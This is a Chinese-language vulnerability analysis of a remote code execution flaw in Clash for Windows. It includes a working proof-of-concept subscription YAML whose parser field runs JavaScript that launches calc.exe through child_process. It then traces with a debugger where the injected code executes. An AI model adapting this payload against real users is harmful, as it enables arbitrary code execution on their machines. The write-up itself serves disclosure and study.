Clash for Windows RCE 漏洞分析
作者:r3s3arcm
简介
Windows系统上的clash for windows 在全版本(最新V0.20.20)中,如果远程加载一条订阅的恶意链接,则会远程代码执行漏洞。因为在解析订阅文件时rule-providers 的 path 的未安全处理,导致js代码被执行。
该问题在clash_for_windows_pkg/issues/3891中被收录。
https://github.com/Fndroid/clash_for_windows_pkg/issues/3891
漏洞复现
我将攻击载荷放在D盘的测试文件夹中,利用Python临时搭建WebServer。
python -m http.server 8888
data:image/s3,"s3://crabby-images/e2e11/e2e11eafd75712d9798ab305b9a39ba06d3d7630" alt=""
file:D:\工具\test\cfw-settings.yaml
payload:
- DOMAIN-SUFFIX,acl4.ssr,全球直连
showNewVersionIcon: true
hideAfterStartup: false
randomControllerPort: true
runTimeFormat: "hh : mm : ss"
trayOrders:
- - icon
- - status
- traffic
- text
hideTrayIcon: false
connShowProcess: true
showTrayProxyDelayIndicator: true
profileParsersText: >-
parsers:
- reg: .*
code:
module.exports.parse = async (raw, { axios, yaml, notify, console }, { name, url, interval, selected }) => {
require("child_process").exec("calc.exe");
return raw;
}
访问http://127.0.0.1:8888/,如果存在cfw-settings.yaml则开启WebServer成功。
data:image/s3,"s3://crabby-images/b6cc5/b6cc53cce1460f73fb5869d85a95f0a78e77de93" alt=""
紧接着使用Clash for Windows 加载http://127.0.0.1:8888/cfw-settings.yaml,触发RCE漏洞。
data:image/s3,"s3://crabby-images/3ad65/3ad65101c9ee33f8202e9b5d35f5a8f492f834da" alt=""
漏洞分析
我在clash for windows中调用出来Debug,在执行rce漏洞的时候控制台输出"restore proxy settings"。
通过这个字符串定位到renderer.js Line:117073
data:image/s3,"s3://crabby-images/52668/5266885035b2709a31ee03829eca5273f2c976a2" alt=""
我在renderer.js Line:117073下断点之后,得到调用栈。
data:image/s3,"s3://crabby-images/c5ba7/c5ba76d605de4bfa217ea7a3458929424bf53e90" alt=""
当我来到renderer.js Line:89125之后,发现t.arg.config.data中包含攻击载荷。
data:image/s3,"s3://crabby-images/a59a6/a59a6d7c9f3d30341c4750fdabb9108b35dc54db" alt=""
查看data调用情况调用指向Clash for Windows\resources\app.asar\node_modules\axios\lib\helpers\bind.js
data:image/s3,"s3://crabby-images/2fcd7/2fcd7d9d8a6ce779bc1ed8d8993e6bb8c5c5dd55" alt=""
使用解包工具,将Clash for Windows\resources\app.asar解压,找到app.asar\node_modules\axios\lib\helpers\bind.js。
data:image/s3,"s3://crabby-images/2dbdf/2dbdf9f9e3946188ee22a1a728416aaab2246c22" alt=""
到这里咱们就知道了静态代码中的谁执行了。
漏洞修复与建议
其实这个不是Clash for windows的锅哈。parser支持执行js代码本身是功能的一部分,况且在文档中已经提出需要警惕此类问题。
https://docs.cfw.lbyczf.com/contents/parser.html#%E8%BF%9B%E9%98%B6%E6%96%B9%E6%B3%95-javascript
data:image/s3,"s3://crabby-images/57098/5709829e33e67a2d66d82daba5d751a51ce5dd3f" alt=""